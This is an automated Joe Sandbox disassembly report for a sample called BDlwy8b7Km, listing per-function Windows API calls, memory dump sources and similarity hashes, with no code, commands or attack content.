                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                  • Instruction ID: 53ac885b77e640447a526f8ebda01f8bb84f81467d18f68a716d919263fbc0ad
                                                  • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                  • Instruction Fuzzy Hash: D381C475A00B06AFE7249EA8CC46FAABBE9FF81724F24452EF551D62C1E770E9408750
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005B82D9,005B82D9,?,?,?,005C644F,00000001,00000001,8BE85006), ref: 005C6258
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005C644F,00000001,00000001,8BE85006,?,?,?), ref: 005C62DE
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005C63D8
                                                  • __freea.LIBCMT ref: 005C63E5
                                                    • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
                                                  • __freea.LIBCMT ref: 005C63EE
                                                  • __freea.LIBCMT ref: 005C6413
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1414292761-0
                                                  • Opcode ID: 5ec364c16197bcd2c2c9387d47df11b749625436630ca590a9a8457d86ba93d3
                                                  • Instruction ID: 0eed0ba23fff481260b7527e5dd743aa6e6e94c5e8ec5abb4559dc3546aafeb9
                                                  • Opcode Fuzzy Hash: 5ec364c16197bcd2c2c9387d47df11b749625436630ca590a9a8457d86ba93d3
                                                  • Instruction Fuzzy Hash: E0518D72600256AFEB258FA4DC85FAF7EAAFB84B50F154A2DF805D7181DB34DE40C660
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 0061C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061B6AE,?,?), ref: 0061C9B5
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061C9F1
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA68
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA9E
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061BCCA
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061BD25
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0061BD6A
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0061BD99
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0061BDF3
                                                  • RegCloseKey.ADVAPI32(?), ref: 0061BDFF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                  • String ID:
                                                  • API String ID: 1120388591-0
                                                  • Opcode ID: 9ea760e7ec91e6d2f18cf5f1d5154719084a4f778fdb8b65b0b236bc869bd5ee
                                                  • Instruction ID: e90a95a443832cde03b86c53635b11e060349699d1bbf83af0cb9cd2e0cef655
                                                  • Opcode Fuzzy Hash: 9ea760e7ec91e6d2f18cf5f1d5154719084a4f778fdb8b65b0b236bc869bd5ee
                                                  • Instruction Fuzzy Hash: 0481A230208241EFD714DF24C895EAABBE6FF84308F18995CF4558B2A2DB31ED45CB92
                                                  APIs
                                                  • VariantInit.OLEAUT32(00000035), ref: 005EF7B9
                                                  • SysAllocString.OLEAUT32(00000001), ref: 005EF860
                                                  • VariantCopy.OLEAUT32(005EFA64,00000000), ref: 005EF889
                                                  • VariantClear.OLEAUT32(005EFA64), ref: 005EF8AD
                                                  • VariantCopy.OLEAUT32(005EFA64,00000000), ref: 005EF8B1
                                                  • VariantClear.OLEAUT32(?), ref: 005EF8BB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCopy$AllocInitString
                                                  • String ID:
                                                  • API String ID: 3859894641-0
                                                  • Opcode ID: eec3421c96f30b34c5df34a0ffb9e32162f79d2d3602d25872eb9acdbf98cf53
                                                  • Instruction ID: f2e4513af012988c72205502151bcd666c58c0c716a8e0d499f0736048a8b741
                                                  • Opcode Fuzzy Hash: eec3421c96f30b34c5df34a0ffb9e32162f79d2d3602d25872eb9acdbf98cf53
                                                  • Instruction Fuzzy Hash: 6F51DA31900751BADF286F66D89972D7BA9FF85310F205466E885DF192DF708C40C766
                                                  APIs
                                                    • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 006094E5
                                                  • _wcslen.LIBCMT ref: 00609506
                                                  • _wcslen.LIBCMT ref: 0060952D
                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00609585
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$FileName$OpenSave
                                                  • String ID: X
                                                  • API String ID: 83654149-3081909835
                                                  • Opcode ID: 5fdcaf1dc5dd5d667482c6972ae8867973cc80df5ff0233345f7199633c7c297
                                                  • Instruction ID: 39f0582ad90e7a3e4c206c3be50781b8d4a6d2b03b08a0ba30eaeb2766de5ea6
                                                  • Opcode Fuzzy Hash: 5fdcaf1dc5dd5d667482c6972ae8867973cc80df5ff0233345f7199633c7c297
                                                  • Instruction Fuzzy Hash: 20E182715043018FDB18DF24C885AABBBE6BFC5314F14896DE8999B3A2DB31DD05CBA1
                                                  APIs
                                                    • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
                                                  • BeginPaint.USER32(?,?,?), ref: 005A9241
                                                  • GetWindowRect.USER32(?,?), ref: 005A92A5
                                                  • ScreenToClient.USER32(?,?), ref: 005A92C2
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005A92D3
                                                  • EndPaint.USER32(?,?,?,?,?), ref: 005A9321
                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 005E71EA
                                                    • Part of subcall function 005A9339: BeginPath.GDI32(00000000), ref: 005A9357
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                  • String ID:
                                                  • API String ID: 3050599898-0
                                                  • Opcode ID: d24a48feaf0d4ac960e407ebe08eb5dec6c6b9ca9eaacfe9e193677e1ff60aa1
                                                  • Instruction ID: 32f285b614262e6bb4ecded8e876705aaffbd35a41ed65e103a02217c14e4855
                                                  • Opcode Fuzzy Hash: d24a48feaf0d4ac960e407ebe08eb5dec6c6b9ca9eaacfe9e193677e1ff60aa1
                                                  • Instruction Fuzzy Hash: 6B41B030104311AFDB20DF25CC89FAA7FB9FF8A720F140629F9948B1A1C7719845DB62
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0060080C
                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00600847
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00600863
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 006008DC
                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006008F3
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00600921
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3368777196-0
                                                  • Opcode ID: 548849faaafb6200cd442bbda44b620f8315aa23997cb78cd28005fbd1b8e3af
                                                  • Instruction ID: 4034a7391e9e0afeb7e6d1dbe4e7708b46869f1d7dbc59737ff0333ecc12bec4
                                                  • Opcode Fuzzy Hash: 548849faaafb6200cd442bbda44b620f8315aa23997cb78cd28005fbd1b8e3af
                                                  • Instruction Fuzzy Hash: A4414C71900206EFEF149F94DC85AAA7BB9FF44310F1480A5ED009A297DB30EE65DBA4
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,005EF3AB,00000000,?,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 0062824C
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00628272
                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 006282D1
                                                  • ShowWindow.USER32(00000000,00000004), ref: 006282E5
                                                  • EnableWindow.USER32(00000000,00000001), ref: 0062830B
                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0062832F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: 635bcd9824adf142e61ef1cf8fc2febf4921d2985c9e4a64e776eff957f5f5fa
                                                  • Instruction ID: 76f93f7fc8413236dc723d8784c5dfb29a993f54db0f088100f8579cac3d04aa
                                                  • Opcode Fuzzy Hash: 635bcd9824adf142e61ef1cf8fc2febf4921d2985c9e4a64e776eff957f5f5fa
                                                  • Instruction Fuzzy Hash: 3A418334603A54EFDB21CF55EC99BE47BE2BB0A714F185269E5084F362CB71A941CF90
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 005F4C95
                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 005F4CB2
                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 005F4CEA
                                                  • _wcslen.LIBCMT ref: 005F4D08
                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 005F4D10
                                                  • _wcsstr.LIBVCRUNTIME ref: 005F4D1A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                  • String ID:
                                                  • API String ID: 72514467-0
                                                  • Opcode ID: 084a98b0ac1861260481218b9710100e8c9b24766cc4df4bbedc6409b70f8ec7
                                                  • Instruction ID: 5997bd331c173562f578ca260dd03756e68e4f480667866bac567bac1ada3bf9
                                                  • Opcode Fuzzy Hash: 084a98b0ac1861260481218b9710100e8c9b24766cc4df4bbedc6409b70f8ec7
                                                  • Instruction Fuzzy Hash: 3921F632204205BBEB255B79AC49E7F7FDDEF85760F108029F905CA192EA65DC019BA0
                                                  APIs
                                                    • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
                                                  • _wcslen.LIBCMT ref: 0060587B
                                                  • CoInitialize.OLE32(00000000), ref: 00605995
                                                  • CoCreateInstance.OLE32(0062FCF8,00000000,00000001,0062FB68,?), ref: 006059AE
                                                  • CoUninitialize.OLE32 ref: 006059CC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                  • String ID: .lnk
                                                  • API String ID: 3172280962-24824748
                                                  • Opcode ID: b0fd139eebacf74bdd8a9bf710f9d2f88ac7c048255d10fe80a3fb4e80d40eb4
                                                  • Instruction ID: 74d19632f5a8d7126d112a9ae3ff2b4f7f1edf84dd81b9308f5ef761d798e5f9
                                                  • Opcode Fuzzy Hash: b0fd139eebacf74bdd8a9bf710f9d2f88ac7c048255d10fe80a3fb4e80d40eb4
                                                  • Instruction Fuzzy Hash: 88D141716086019FCB18DF24C49496BBBE6FF89710F158859F88A9B3A1DB31EC45CF92
                                                  APIs
                                                    • Part of subcall function 005F0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005F0FCA
                                                    • Part of subcall function 005F0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005F0FD6
                                                    • Part of subcall function 005F0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005F0FE5
                                                    • Part of subcall function 005F0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005F0FEC
                                                    • Part of subcall function 005F0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005F1002
                                                  • GetLengthSid.ADVAPI32(?,00000000,005F1335), ref: 005F17AE
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005F17BA
                                                  • HeapAlloc.KERNEL32(00000000), ref: 005F17C1
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 005F17DA
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,005F1335), ref: 005F17EE
                                                  • HeapFree.KERNEL32(00000000), ref: 005F17F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 3008561057-0
                                                  • Opcode ID: c69a28e985f5db0898e23b508874ea1907db51e2eaa65cd096a3777deaf84683
                                                  • Instruction ID: eab9e897703136e05e405847b3cd5d81096a6c74318ebcd65bbf4c1f9453224a
                                                  • Opcode Fuzzy Hash: c69a28e985f5db0898e23b508874ea1907db51e2eaa65cd096a3777deaf84683
                                                  • Instruction Fuzzy Hash: 4011BE31902A09FFDB24AFA4CC4ABBF7BAAFF41365F104018F54597210C73AA945DB64
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005F14FF
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 005F1506
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005F1515
                                                  • CloseHandle.KERNEL32(00000004), ref: 005F1520
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005F154F
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 005F1563
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: 5e396a1ee5ed0c7809967e30958c1640f87c3eef65e02ea01976082d1ca30cd8
                                                  • Instruction ID: 8b9e0411d0f647788b3dcbf18eaab4e22aa003ed460d5c8336cd78bae38ffe3d
                                                  • Opcode Fuzzy Hash: 5e396a1ee5ed0c7809967e30958c1640f87c3eef65e02ea01976082d1ca30cd8
                                                  • Instruction Fuzzy Hash: AC11177250064EEBDF218F98DD49FEE7BAAFF48754F144015FA05A2060C3768E619B64
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,005B3379,005B2FE5), ref: 005B3390
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005B339E
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005B33B7
                                                  • SetLastError.KERNEL32(00000000,?,005B3379,005B2FE5), ref: 005B3409
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 3a7a7ebc85008161fde33e1f77f9219036ae67c286021a98396d17b1d27a0955
                                                  • Instruction ID: 83ad5fe37c47cec18d292c90c13c2680c31730b64a76d39723be78a3a845d81e
                                                  • Opcode Fuzzy Hash: 3a7a7ebc85008161fde33e1f77f9219036ae67c286021a98396d17b1d27a0955
                                                  • Instruction Fuzzy Hash: 18014C33208712BEEB242774BC9A6E72F95FB45376B300629F410A11F0EF127D01D544
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,005C5686,005D3CD6,?,00000000,?,005C5B6A,?,?,?,?,?,005BE6D1,?,00658A48), ref: 005C2D78
                                                  • _free.LIBCMT ref: 005C2DAB
                                                  • _free.LIBCMT ref: 005C2DD3
                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,005BE6D1,?,00658A48,00000010,00594F4A,?,?,00000000,005D3CD6), ref: 005C2DE0
                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,005BE6D1,?,00658A48,00000010,00594F4A,?,?,00000000,005D3CD6), ref: 005C2DEC
                                                  • _abort.LIBCMT ref: 005C2DF2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: 6be51fac5b911fdf749bbccc773f0ca81ccfb14e75b2777742c8a831f6643f5e
                                                  • Instruction ID: c42b9db31c6ec68c5947cffb917e7b73e512c84b3dcf141d444b02a1b3817bd8
                                                  • Opcode Fuzzy Hash: 6be51fac5b911fdf749bbccc773f0ca81ccfb14e75b2777742c8a831f6643f5e
                                                  • Instruction Fuzzy Hash: B3F08635504B026FD72267F86C0AF5E1D5A7BD1771F25451CF426921D1DE3488035160
                                                  APIs
                                                    • Part of subcall function 005A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005A9693
                                                    • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96A2
                                                    • Part of subcall function 005A9639: BeginPath.GDI32(?), ref: 005A96B9
